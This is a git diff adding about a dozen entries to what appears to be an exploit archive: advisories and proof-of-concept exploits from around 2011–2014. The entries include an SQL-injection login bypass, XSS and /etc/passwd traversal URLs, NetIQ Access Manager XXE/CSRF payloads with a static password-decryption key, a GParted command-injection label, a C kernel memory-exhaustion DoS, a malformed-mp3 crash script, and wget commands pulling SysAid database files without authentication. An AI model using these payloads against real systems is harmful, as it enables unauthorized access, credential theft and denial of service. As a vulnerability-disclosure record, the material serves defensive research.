diff --git a/files.csv b/files.csv index 46262adde..edd271cd5 100755 --- a/files.csv +++ b/files.csv @@ -32046,3 +32046,17 @@ id,file,description,date,author,platform,type,port 35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0 35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082 35588,platforms/php/remote/35588.rb,"Lotus Mail Encryption Server (Protector for Mail) LFI to RCE",2014-12-22,"Patrick Webster",php,remote,9000 +35590,platforms/windows/local/35590.txt,"BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability",2014-12-23,LiquidWorm,windows,local,0 +35592,platforms/windows/dos/35592.py,"jetAudio 8.1.3 Basic (mp3) - Crash POC",2014-12-23,"Drozdova Liudmila",windows,dos,0 +35593,platforms/windows/webapps/35593.txt,"SysAid Server Arbitrary File Disclosure",2014-12-23,"Bernhard Mueller",windows,webapps,0 +35594,platforms/jsp/webapps/35594.txt,"NetIQ Access Manager 4.0 SP1 - Multiple Vulnerabilities",2014-12-23,"SEC Consult",jsp,webapps,8443 +35595,platforms/linux/local/35595.txt,"GParted 0.14.1 - OS Command Execution",2014-12-23,"SEC Consult",linux,local,0 +35596,platforms/php/webapps/35596.txt,"eGroupware 1.8.1 'test.php' Cross Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0 +35597,platforms/hardware/remote/35597.txt,"Fiberhome HG-110 Cross Site Scripting and Directory Traversal Vulnerabilities",2011-04-08,Zerial,hardware,remote,0 +35598,platforms/php/webapps/35598.txt,"1024cms 1.1.0 beta Multiple Input Validation Vulnerabilities",2011-04-08,"QSecure and Demetris Papapetrou",php,webapps,0 +35599,platforms/asp/webapps/35599.txt,"Dimac CMS 1.3 XS 'default.asp' SQL Injection Vulnerability",2011-04-11,KedAns-Dz,asp,webapps,0 +35600,platforms/linux/dos/35600.c,"Linux Kernel 2.6.x 'inotify_init1()' Double Free Local Denial of Service Vulnerability",2011-04-11,anonymous,linux,dos,0 +35601,platforms/php/webapps/35601.txt,"Etki Video PRO 2.0 izle.asp id Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 +35602,platforms/php/webapps/35602.txt,"Etki Video PRO 2.0 kategori.asp cat Parameter SQL Injection",2011-04-11,Kurd-Team,php,webapps,0 +35603,platforms/php/webapps/35603.txt,"Live Wire 2.3.1 For Wordpress Multiple Security Vulnerabilities",2011-04-11,MustLive,php,webapps,0 +35604,platforms/php/webapps/35604.txt,"eForum 1.1 '/eforum.php' Arbitrary File Upload Vulnerability",2011-04-09,QSecure,php,webapps,0 diff --git a/platforms/asp/webapps/35599.txt b/platforms/asp/webapps/35599.txt new file mode 100755 index 000000000..c1cc9c183 --- /dev/null +++ b/platforms/asp/webapps/35599.txt @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/47291/info + +Dimac CMS XS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +Dimac CMS XS 1.3 is vulnerable; other versions may also be affected. + +The following example URI and data are available: + +http://www.example.com/[path]/CMSadmin/default.asp + +Username : admin +Password : 1'or'1'='1 \ No newline at end of file diff --git a/platforms/hardware/remote/35597.txt b/platforms/hardware/remote/35597.txt new file mode 100755 index 000000000..512bbe950 --- /dev/null +++ b/platforms/hardware/remote/35597.txt @@ -0,0 +1,17 @@ +source: http://www.securityfocus.com/bid/47277/info + +Fiberhome HG-110 is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks. + +Fiberhome HG-110 firmware 1.0.0 is vulnerable other versions may also be affected. + +The following example URIs are available: + +http://www.example.com/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns + +Local File Include and Directory/Path Traversal: + +- +http://www.example.com/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns + diff --git a/platforms/jsp/webapps/35594.txt b/platforms/jsp/webapps/35594.txt new file mode 100755 index 000000000..c1a50569d --- /dev/null +++ b/platforms/jsp/webapps/35594.txt @@ -0,0 +1,213 @@ +SEC Consult Vulnerability Lab Security Advisory < 20141218-2 > +======================================================================= + title: Multiple high risk vulnerabilities + product: NetIQ Access Manager +vulnerable version: 4.0 SP1 + fixed version: 4.0 SP1 Hot Fix 3 + CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216, + CVE-2014-5217 + impact: High + homepage: https://www.netiq.com/ + found: 2014-10-29 + by: W. Ettlinger + SEC Consult Vulnerability Lab + https://www.sec-consult.com +======================================================================= + +Vendor/product description: +--------------------------- +"As demands for secure web access expand and delivery becomes increasingly +complex, organizations face some formidable challenges. Access Manager +provides a simple yet secure and scalable solution that can handle all your +web access needs—both internal as well as in the cloud." + +URL: https://www.netiq.com/products/access-manager/ + + +Business recommendation: +------------------------ +An attacker without an account on the NetIQ Access Manager is be able to gain +administrative access by combining different attack vectors. Though this host +may not always be accessible from a public network, an attacker is still able +to compromise the system when directly targeting administrative users. + +Because the NetIQ Access Manager is used for authentication, an attacker +compromising the system can use it to gain access to other systems. + +SEC Consult highly recommends that this software is not used until a full +security review has been performed and all issues have been resolved. + + +Vulnerability overview/description: +----------------------------------- +1) XML eXternal Entity Injection (XXE, CVE-2014-5214) +Authenticated administrative users can download arbitrary files from the Access +Manager administration interface as the user "novlwww". + +The vendor provided the following KB link: +https://www.novell.com/support/kb/doc.php?id=7015993 + + +2) Reflected Cross Site Scripting (XSS, CVE-2014-5216) +Multiple reflected cross site scripting vulnerabilities were found. These +allow effective attacks of administrative and SSLVPN sessions. + +The vendor provided the following KB link: +https://www.novell.com/support/kb/doc.php?id=7015994 + + +3) Persistent Site Scripting (XSS, CVE-2014-5216) +A persistent cross site scripting vulnerability was found. This allows +effective attacks of administrative and SSLVPN sessions. + +The vendor provided the following KB link: +https://www.novell.com/support/kb/doc.php?id=7015996 + + +4) Cross Site Request Forgery (CVE-2014-5217) +The Access Manager administration interface does not have CSRF protection. + +The vendor provided the following KB link: +https://www.novell.com/support/kb/doc.php?id=7015997 + + +5) Information Disclosure (CVE-2014-5215) +Authenticated users of the administration interface can gain authentication +information of internal administrative users. + +The vendor provided the following KB link: +https://www.novell.com/support/kb/doc.php?id=7015995 + + +By combining all of the above vulnerabilities (CSRF, XSS, XXE) an +unauthenticated, non-admin user may gain full access to the system! + + +Proof of concept: +----------------- +1) XML eXternal Entity Injection (XXE) +As an example, the following URL demonstrates the retrieval of the /etc/passwd +file as an authenticated administrative user: + +https://:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=%0a]>%26include%3bfalse + + +2) Reflected Cross Site Scripting (XSS) +The following URLs demonstrate different reflected XSS flaws in the +administration interface and the user interface. + +https://:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b' + +https://:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E + +https://:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E + +https:///nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E + +https:///sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E + + +3) Persistent Site Scripting (XSS) +The following URL injects a stored script on the auditing page: + +https://:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+x(){if('&port=1289 + + +4) Cross Site Request Forgery +As an example, an attacker is able to change the administration password to +'12345' by issuing a GET request in the context of an authenticated +administrator. The old password is not necessary for this attack! + +https://:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345 + + +5) Information Disclosure +The following URLs disclose several useful information to an authenticated +account: + +https://:8443/roma/jsp/volsc/monitoring/dev_services.jsp +https://:8443/roma/jsp/debug/debug.jsp + +The disclosed system properties: +com.volera.vcdn.monitor.password +com.volera.vcdn.alert.password +com.volera.vcdn.sync.password +com.volera.vcdn.scheduler.password +com.volera.vcdn.publisher.password +com.volera.vcdn.application.sc.scheduler.password +com.volera.vcdn.health.password + +The static string "k~jd)*L2;93=Gjs" is XORed with these values in order +to decrypt passwords of internally used service accounts. + + + +By combining all of the above vulnerabilities (CSRF, XSS, XXE) an +unauthenticated, non-admin user may gain full access to the system! + + +Vulnerable / tested versions: +----------------------------- +The vulnerabilities have been verified to exist in the NetIQ Access Manager +version 4.0 SP1, which was the most recent version at the time of discovery. + + +Vendor contact timeline: +------------------------ +2014-10-29: Contacting security@netiq.com, sending responsible disclosure + policy and PGP keys +2014-10-29: Vendor redirects to security@novell.com, providing PGP keys + through Novell support page +2014-10-30: Sending encrypted security advisory to Novell +2014-10-30: Novell acknowledges the receipt of the advisory +2014-12-16: Novell: the vulnerability fixes will be released tomorrow; + The CSRF vulnerability will not be fixed immediately + ("Since this can be done only after an authorized login"); + two XSS vulnerabilities can not be exploited ("We could not + take advantage or retrieve any cookie info on the server + side - it looks like it's a client side cross scripting + attack.") +2014-12-16: Explaining why those vulnerabilities can be exploited +2014-12-17: Novell: Fix will be released tomorrow +2014-12-17: Verifying release of advisory tomorrow +2014-12-18: Novell: Advisory can be released +2014-12-18: Coordinated release of security advisory + + +Solution: +--------- +Update to the latest available of Access Manager and implement workarounds +mentioned in the KB articles by Novell linked above. + + +Workaround: +----------- +For some vulnerabilities, Novell provides best practice recommendations in the +URLs linked above. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEC Consult Vulnerability Lab + +SEC Consult +Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich + +Headquarter: +Mooslackengasse 17, 1190 Vienna, Austria +Phone: +43 1 8903043 0 +Fax: +43 1 8903043 15 + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +Interested to work with the experts of SEC Consult? +Write to career@sec-consult.com + +EOF W. Ettlinger / @2014 diff --git a/platforms/linux/dos/35600.c b/platforms/linux/dos/35600.c new file mode 100755 index 000000000..ab5ef3786 --- /dev/null +++ b/platforms/linux/dos/35600.c @@ -0,0 +1,22 @@ +source: http://www.securityfocus.com/bid/47296/info + +The Linux kernel is prone to a local denial-of-service vulnerability. + +Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users. + +#include +#include + +int main(int argc, char *argv[]) +{ + int fds[2]; + + /* Circumvent max inotify instances limit */ + while (pipe(fds) != -1) + ; + + while (1) + inotify_init(); + + return 0; +} \ No newline at end of file diff --git a/platforms/linux/local/35595.txt b/platforms/linux/local/35595.txt new file mode 100755 index 000000000..df450585c --- /dev/null +++ b/platforms/linux/local/35595.txt @@ -0,0 +1,123 @@ +SEC Consult Vulnerability Lab Security Advisory < 20141218-1 > +======================================================================= + title: OS Command Execution + product: GParted - Gnome Partition Editor +vulnerable version: <=0.14.1 + fixed version: >=0.15.0, + <=0.14.1 with fix for CVE-2014-7208 applied + CVE number: CVE-2014-7208 + impact: medium + homepage: http://gparted.org/ + found: 2014-07 + by: W. Ettlinger + SEC Consult Vulnerability Lab + https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +"GParted is a free partition editor for graphically managing your disk +partitions. + +With GParted you can resize, copy, and move partitions without data +loss, enabling you to: +* Grow or shrink your C: drive +* Create space for new operating systems +* Attempt data rescue from lost partitions" + +URL: http://gparted.org/index.php + + +Vulnerability overview/description: +----------------------------------- +Gparted <=0.14.1 does not properly sanitize strings before passing +them as parameters to an OS command. Those commands are executed +using root privileges. + +Parameters that are being used for OS commands in Gparted are normally +determined by the user (e.g. disk labels, mount points). However, under +certain circumstances, an attacker can use an external storage device to +inject command parameters. These circumstances are met if for example an +automounter uses a filesystem label as part of the mount path. + +Please note that GParted versions before 0.15 are still being used +in distributions. E.g Debian Wheezy is vulnerable to this issue before +applying the patches. + + +Proof of concept: +----------------- +The following command creates a malicious filesystem. + +# mkfs.ext2 -L "\`reboot\`" /dev/sdXX + +When this filesystem is mounted by an automounter to a mountpoint +containing the filesystem label and the user tries to unmount this filesystem +using GParted, the system reboots. + +Vulnerable / tested versions: +----------------------------- +Gparted versions <=0.14.1 were found to be vulnerable. + + +Vendor contact timeline: +------------------------ +2014-10-29: Contacting maintainer (Curtis Gedak) through + gedakc AT users DOT sf DOT net +2014-10-29: Initial response from maintainer offering encryption +2014-10-30: Sending encrypted advisory +2014-10-30: Maintainer confirms the behaviour, will be investigated + further +2014-11-04: Maintainer sends initial patches +2014-11-05: Giving a few notes on the patches +2014-11-05: Maintainer clarifies a few concerns with the patches; + Forwards patches to Mike Fleetwood for review +2014-11-08: Review shows that the patches cause functional + problems; proposes further procedure +2014-11-08: Maintainer proposes a different patching approach +2014-11-08: Reviewer shows concerns with this approach, opens + a security bug (1171909) with Fedora (in accordance with + their Security Tracking Bugs procedure); + Red Hat creates tracking bug 1172549 +2014-11-15: New patches for several versions +2014-11-23: Maintainer sends vulnerability information to Debian +2014-11-29: Debian Security Team responds, asks for embargo date and + CVE number +2014-11-30: Release date set to 2014-12-18 +2014-12-11: Mailing list linux-distros AT vs DOT openwall DOT org informed +2014-12-11: Writing that embargo may be lifted, SEC Consult will release + advisory on 2014-12-18 +2014-12-18: Coordinated release of security advisory + + +Solution: +--------- +Update GParted to version >= 0.15.0 or apply security patches for +CVE-2014-7208. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEC Consult Vulnerability Lab + +SEC Consult +Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich + +Headquarter: +Mooslackengasse 17, 1190 Vienna, Austria +Phone: +43 1 8903043 0 +Fax: +43 1 8903043 15 + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +Interested to work with the experts of SEC Consult? +Write to career@sec-consult.com + +EOF W. Ettlinger / @2014 diff --git a/platforms/php/webapps/35596.txt b/platforms/php/webapps/35596.txt new file mode 100755 index 000000000..2c980fa6a --- /dev/null +++ b/platforms/php/webapps/35596.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47273/info + +eGroupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. + +eGroupware 1.8.001 is vulnerable; other versions may also be affected. + +http://www.example.com/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/35598.txt b/platforms/php/webapps/35598.txt new file mode 100755 index 000000000..eecfdb7d8 --- /dev/null +++ b/platforms/php/webapps/35598.txt @@ -0,0 +1,19 @@ +source: http://www.securityfocus.com/bid/47282/info + +1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability + +An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process ad gain access to sensitive information. + +1024cms 1.1.0 beta is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00 +http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b +http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd +http://www.example.com/index.php?act=../../../../../../etc/passwd%00 +http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00 +http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b +http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b +http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b +http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b +http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b + diff --git a/platforms/php/webapps/35601.txt b/platforms/php/webapps/35601.txt new file mode 100755 index 000000000..69c317315 --- /dev/null +++ b/platforms/php/webapps/35601.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47298/info + +Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +Etki Video Pro 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/izle.asp?id=254 [SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35602.txt b/platforms/php/webapps/35602.txt new file mode 100755 index 000000000..25eeb504a --- /dev/null +++ b/platforms/php/webapps/35602.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/47298/info + +Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. + +A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. + +Etki Video Pro 2.0 is vulnerable; other versions may also be affected. + +http://www.example.com/[path]/kategori.asp?cat=1 [SQL Injection] \ No newline at end of file diff --git a/platforms/php/webapps/35603.txt b/platforms/php/webapps/35603.txt new file mode 100755 index 000000000..dc20e0ee2 --- /dev/null +++ b/platforms/php/webapps/35603.txt @@ -0,0 +1,13 @@ +source: http://www.securityfocus.com/bid/47299/info + +Live Wire for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability. + +Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible. + +Live Wire for Wordpress 2.3.1 is vulnerable; other versions may also be affected. + +http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg + +http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=jpg + +http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1 \ No newline at end of file diff --git a/platforms/php/webapps/35604.txt b/platforms/php/webapps/35604.txt new file mode 100755 index 000000000..f6af6fed0 --- /dev/null +++ b/platforms/php/webapps/35604.txt @@ -0,0 +1,18 @@ +source: http://www.securityfocus.com/bid/47309/info + +eForum is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input. + +An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process. + +eForum 1.1 is vulnerable; other versions may also be affected. + +if (isset($_FILES)) { //upload attachments + ...snip... + $invalidFileTypes = array('php', 'php3', 'php4', 'php5', 'exe', 'dll', 'so', 'htaccess'); + $uploaddir = $eforum->path.'/upload'; + $upfiles = $_FILES['efattachment']; + foreach ($upfiles['name'] as $idx => $upname) { + if ($upname != '') { + $source = $upfiles['tmp_name'][$idx]; + if (is_uploaded_file($source)) { + if (in_array($fmanager->FileExt($upname), $invalidFileTypes)) { continue; } \ No newline at end of file diff --git a/platforms/windows/dos/35592.py b/platforms/windows/dos/35592.py new file mode 100755 index 000000000..56047cdb0 --- /dev/null +++ b/platforms/windows/dos/35592.py @@ -0,0 +1,30 @@ +# Exploit Title : jetAudio 8.1.3 Basic (Corrupted mp3) Crash POC +# Product : jetAudio Basic +# Date : 8.12.2014 +# Exploit Author : ITDefensor Vulnerability Research Team http://itdefensor.ru/ +# Software Link : http://www.jetaudio.com/download/ +# Vulnerable version : 8.1.3 (Latest at the moment) and probably previous versions +# Vendor Homepage : http://www.jetaudio.com/ +# Tested on : jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86 +# CVE : unknown at the moment +#============================================================================================ +# Open created POC file (fault.mp3) with jetAudio +# Details +# (1e764.1df98): Access violation - code c0000005 (first chance) +# First chance exceptions are reported before any exception handling. +# This exception may be expected and handled. +# jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9: +# 0aa6b8b9 8b4804 mov ecx,dword ptr [eax+4] ds:002b:00000004=???????? +# 0:000:x86> kb +# ChildEBP RetAddr Args to Child +# WARNING: Stack unwind information not available. Following frames may be wrong. +# 00000000 00000000 00000000 00000000 00000000 jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9 +#============================================================================================ +#!/usr/bin/python + +pocdata=("\x49\x44\x33\x00\x00\xC9\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\xFF\x8E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x41\x47\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00") + +mp3file = "fault.mp3" +file = open(mp3file , "w") +file.write(pocdata) +file.close() \ No newline at end of file diff --git a/platforms/windows/local/35590.txt b/platforms/windows/local/35590.txt new file mode 100755 index 000000000..2153db5ad --- /dev/null +++ b/platforms/windows/local/35590.txt @@ -0,0 +1,81 @@ +? +BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability + + +Vendor: BitRaider, LLC +Product web page: http://www.bitraider.com +Affected version: 1.3.3.4098 + +Summary: BitRaider is a video game streaming and download service. + +Desc: BitRaider contains a flaw that leads to unauthorized privileges being gained. +The issue is due to the program granting improper permissions with the 'F' flag for +the 'Users' group, which makes the entire 'BitRaider' directory and its sub directories +and files world-writable. This may allow a local attacker to change an executable file +with a binary file and gain elevated privileges. + +List of executables affected: + +o====================================================================================================o +| Binary/location | Description | +| | | +|=============================================================== ====================================| +| C:\ProgramData\BitRaider\BRSptStub.exe | BitRaider Support Stub | +|---------------------------------------------------------------|------------------------------------| +| C:\ProgramData\BitRaider\common\BRException.exe | BitRaider Exception Handler | +|---------------------------------------------------------------|------------------------------------| +| C:\ProgramData\BitRaider\common\brwc.exe | BitRaider Distribution Web Client | +|---------------------------------------------------------------|------------------------------------| +| C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRSptSvc.exe | BitRaider Support Service Core | +o====================================================================================================o + + +Tested on: Microsoft Windows 7 Professional SP1 (EN) + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2014-5217 +Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5217.php + + +17.12.2014 + +---- + + +C:\Users\user>sc qc BRSptStub +[SC] QueryServiceConfig SUCCESS + +SERVICE_NAME: BRSptStub + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 3 DEMAND_START + ERROR_CONTROL : 0 IGNORE + BINARY_PATH_NAME : "C:\ProgramData\BitRaider\BRSptStub.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : BitRaider Mini-Support Service Stub Loader + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +C:\Users\user>icacls "C:\ProgramData\BitRaider\BRSptStub.exe" +C:\ProgramData\BitRaider\BRSptStub.exe BUILTIN\Users:(F) <-------------------------- + NT AUTHORITY\SYSTEM:(F) + NT AUTHORITY\Authenticated Users:(F) <------- + BUILTIN\Administrators:(F) + NT AUTHORITY\INTERACTIVE:(F) <--------------- + NT AUTHORITY\SERVICE:(F) + BUILTIN\Guests:(RX) + BUILTIN\Users:(I)(F) <----------------------- + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\Authenticated Users:(I)(F) <---- + BUILTIN\Administrators:(I)(F) + NT AUTHORITY\INTERACTIVE:(I)(F) <------------ + NT AUTHORITY\SERVICE:(I)(F) + BUILTIN\Guests:(I)(RX) + +Successfully processed 1 files; Failed processing 0 files + +C:\Users\user> diff --git a/platforms/windows/webapps/35593.txt b/platforms/windows/webapps/35593.txt new file mode 100755 index 000000000..9c357eeed --- /dev/null +++ b/platforms/windows/webapps/35593.txt @@ -0,0 +1,67 @@ +Vantage Point Security Advisory 2014-004 +======================================== + +Title: SysAid Server Arbitrary File Disclosure +ID: VP-2014-004 +Vendor: SysAid +Affected Product: SysAid On-Premise +Affected Versions: < 14.4.2 +Product Website: http://www.sysaid.com/product/sysaid +Author: Bernhard Mueller + + +Summary: +--- +SysAid Server is vulnerable to an unauthenticated file disclosure +attack that allows an anonymous attacker to read arbitrary files on +the system. An attacker exploiting this issue can compromise SysAid +user accounts and gain access to important system files. When SysAid +is configured to use LDAP authentication it is possible to gain read +access to the entire Active Directory or obtain domain admin +privileges. + +Details: +--- + +How to download SysAid server database files containing usernames and +password hashes (use any unauthenticated session ID): + +wget -O "ilient.mdf" --header="Cookie: +JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \ +"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf" + +wget -O "ilient.ldf" --header="Cookie: +JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \ +"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF" + + +The dowloaded MSSQL files contain the LDAP user account and encrypted +password used to access the Active Directory (SysAid encrypts the +password with a static key that is the same for all instances of the +software). + + +Fix Information: +--- + +Upgrade to version 14.4.2. + + +Timeline: +--- + +2014/11/14: Issue reported +2014/12/22: Patch available and installed by client + +About Vantage Point Security: +--- + +Vantage Point Security is the leading provider for penetration testing +and security advisory services in Singapore. Clients in the Financial, +Banking and Telecommunications industries select Vantage Point +Security based on technical competency and a proven track record to +deliver significant and measurable improvements in their security +posture. + +Web: https://www.vantagepoint.sg/ +Contact: office[at]vantagepoint[dot]sg \ No newline at end of file